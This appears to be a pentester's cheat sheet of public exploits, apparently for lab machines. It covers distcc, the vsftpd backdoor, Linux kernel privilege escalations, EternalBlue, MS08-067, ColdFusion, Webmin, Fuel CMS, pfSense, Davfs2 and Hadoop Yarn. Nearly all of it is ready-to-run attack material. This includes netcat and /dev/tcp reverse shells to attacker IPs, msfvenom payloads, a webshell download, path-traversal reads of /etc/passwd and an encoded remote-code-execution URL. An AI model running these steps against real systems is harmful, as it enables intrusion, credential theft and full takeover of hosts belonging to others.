Public Exploits

distccd v1

nmap --script distcc-cve2004-2687 -p 3632 10.10.10.3
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.6 4444 -e /bin/bash'"
python CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c whoami                                         
[OK] Connected to remote service
                                                          
--- BEGIN BUFFER ---                                                                                                                                                                                                                       
daemon
--- END BUFFER ---
[OK] Done.

VSFTPD v2.3.4

nmap --script ftp-vsftpd-backdoor -p 21 10.10.10.3
#Manual Exploitation
telnet IP 21
USER user:)
PASS pass

# Check if Port 6200 has opened.

Kernel Exploits

Linnux 2.6.32 < 3.x (CentOS - x86)

cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c 
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542

Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04)

  • Requires:

    • PID of Udevd

    • Create /tmp/run. Exploit will run /tmp/run file

      cat /proc/net/netlink
      sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
      
      dcc4be00 15  2687   00000001 0        0        00000000 2
      ddf0dc00 15  0      00000000 0        0        00000000 2
      

Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation

#Tested on x86 - Linux 3.0.0-12-generic
gcc mempodipper.c -o espriv
./espriv

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW'

gcc -pthread dirty.c -o dirty -lcrypt
./dirty 

#Or ./dirty my-new-password
su firefart

#Or ssh firefart@...

Link: https://www.exploit-db.com/exploits/47080

gcc Exploit.c -o Exploit -lcrypto

./Exploit 0x6b 192.168.1.5 443 -c 50

Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)

Link:https://www.exploit-db.com/exploits/45010

  • Compile on local machine and run on target in case target does not have gcc.

Elastix 2.2

PBX

MS17-010 [Eternal Blue ]

EXPLOIT 1

Reference:https://outrunsec.com/2020/07/26/cyberseclabs-eternal-walkthrough/

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
pip install -r requirements.txt

#Identify valid named pipes
python eternal_checker.py <Target>

#Opens and SMB interactive shell. This may not always work
python zzz_exploit.py <Target>

#Generate a Payload
cd shellcode
sudo ./shell_prep.sh

#Both x64, x86 payloads are generated. Select based on target arch.
python eternalblue_exploit7.py <Target> /shellcode/sc_all.bin

EXPLOIT 2

  1. Download mysmb.py since the exploit imports it. The download location is included in the exploit.

  2. Use MSFvenom to create a reverse shell payload.

  3. Make changes in the exploit to add the authentication credentials and the reverse shell payload. [Guest :: <Blank password>]

Generate Payload

msfvenom -p windows/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe

Exploit Modification

  • Modify these two lines for smb_send_file and service_exec.

    • Uncomment the lines

    • Add the exploit file to send

    • Payload to execute from the client side.

  • Add Authentication Credentials

    • 'guest' for anonymous login]

    • If the above does not work check with USERNAME = ' '

#Setup Listener

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
pip install -r requirements.txt
#Identify valid named pipes
python eternal_checker.py <Target>

python 42315.py 10.10.10.40
python 42315.py 10.10.10.40 <named pipe>

EXPLOIT 3

MS08-067

Create Shellcode

  • -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" - The bad characters not to use. I got this from the comments in the python code.

  • -f py - Output in python format. The examples use c format, and just pasted it in slightly differently. Either will work.

  • -v shellcode - Have the code set the variable shellcode, instead of the default, buf. I want this to match what it’s called in the code I’m using.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

Take this shellcode into the script, and paste it in replacing the default.

The exploit requires that I know the version of Windows and the Language pack:

Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
#Set up listener
#Usage
python ms08-067.py 10.10.10.4 6 445

ColdFusion 8

LFI

http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
  • Grab the hash and crack it.

RCE through Scheduled Task:

  • Login -> Debugging&Logging -> Scheduled Tasks.

  • Scheduled task setup gives you the ability to download a file from a webserver and save the output locally.

  • Default Location Mapping from:http://10.11.1.10/CFIDE/administrator/reports/index.cfm > ColdFusion Mappings

  • Create a reverse shell and host it on our server.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp
python -m SimpleHTTPServer 80
  • Set the below task config:

    • Task Name: Shell

    • URL: Webserver hosting the JSP shell

    • Check the box for Save output to a file

    • File:C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

  • After submitting we run the task on demand under Actions.

  • Set-up a listener and browse to http://10.10.10.18:8080/CFIDE/shell.jsp

| --- CVE-2009-2265 --- |

- RCE through File Upload:

./exploit.py <target ip> <target port> </path/to/payload.jsp>

- Manual Exploitation

POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exp.cfm%00 HTTP/1.0
Host: 111.111.11.11
Content-Length: 287
Content-Type: multipart/form-data; boundary=o0oOo0o
Connection: close

--o0oOo0o
Content-Disposition: form-data; name="NewFile"; filename="exploit.txt"
Content-Type: text/plain

 %Exploit code%
--o0oOo0o--

| ---CVE-2018-15961--- |

Metasploit Module: https://packetstormsecurity.com/files/151095/Adobe-Coldfusion-11-CKEditor-Arbitrary-File-Upload.html

#Access uploaded file at <URL>/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: 172.31.1.15:8500
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 1832
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="shell"
Content-Type: text/plain

<Exploit-code in JSP>

-----------------------------24464570528145
Content-Disposition: form-data; name="path"
shell
-----------------------------24464570528145--

Webmin

File Dislosure [LFI]

  • http://<url>/unauthenticated/..%01 * 40

http://<url>/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/
..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/
..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/
..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd

Fuel CMS 1.4 RCE

Fuel CMS 1.4 is affected by a Code Evaluation + SQLi vulnerability that can be chained for RCE.

  • Use Burp to intercept as payload output will be found in the source code.

Payload:

https://<TARGET-IP>/fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27<insert code here >%27%29%2b%27

For Example, within Burp: /fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami;cat /etc/passwd%27%29%2b%27

To get a Reverse shell:

  • wget http://<attackers-IP>/webshell.php -o shell.php

  • Set-up a listener & access http://<target-IP>/shell.php

DotNetNuke [DNN]

Nibbleblog 4.0.3

Pre-requisites:

Exploitation

  • Login to nibbleblog: http://<IP>/nibbleblog/admin.php?controller=plugins

  • Upload PHP reverse shell: http://<IP>/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

    • Ignore errors

  • Access webshell at default location: http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

pfSense

Reference

  • Vulnerability arises because the '| ' character is not filtered.

  • Target URL:<URL>/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"

Pre-requisites:

  • Admin credentials [Default admin :: pfsense]

Exploitation

  • Python payload - > Converted to octal -> Few characters removed to avoid errors - > Saved to temp file on target - > executed by target server in php [printf]

python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.5 --lport 4445 --username rohit --password pfsensepython 43560.py --rhost 10.10.10.60 --lhost 10.10.14.5 --lport 4445 --username rohit --password pfsense

Davfs2 1.4.6 Local Priv Esc

#Find file storing Basic Auth credentials
head /etc/apache2/sites-enabled/000-default

#Set new credentials[Based on current encryption, use htpasswd / htdigest]
htdigest /<Location of Basic Auth credentials file> webdav newuser
#<Enter Password for newuser>

wget --no-check-certificate https://www.exploit-db.com/download/28806 -O 28806.temp.txt
tr -d '\r' < 28806.temp.txt > 28806.txt
sed -n '40,73p' 28806.txt > coda.c
sed -n '84,90p' 28806.txt > Makefile
sed -n '101,192p' 28806.txt > exploit.sh
echo '#!/usr/bin/env bash' > /home/dave/rootprog
echo 'bash -i >& /dev/tcp/<Attacker IP>/1234 0>&1' >> /home/jolein/rootprog
chmod +x /home/dave/rootprog
chmod +x exploit.sh
echo 'kernel_fs       coda' >> .davfs2/davfs2.conf

#Set up listener on attacker host
nc -nlvp 1234

#Execute exploit on target
./exploit.sh
mount /mnt/dav/
#Enter credentials for newuser when prompted.

Hadoop Yarn RCE

#Check if API endpoint is available
curl -v -X POST 'http://ip:8088/ws/v1/cluster/apps/new-application'

#Expected response
{ “application-id” : “application_1527144634877_20465”, 
“maximum-resource-capability” :{{ “memory” :16384, “vCores” :8}}

#Create a task(test.json) and submit via curl
curl -s -i -X ​​POST -H 'Accept: application/json' -H 'Content-Type: application/json' 
'http://ip:8088/ws/v1/cluster/apps' -data-binary @test.json
  • Contents of test.json

Apache NiFi RCE

python exploit.py <Target IP> <Command>

Last updated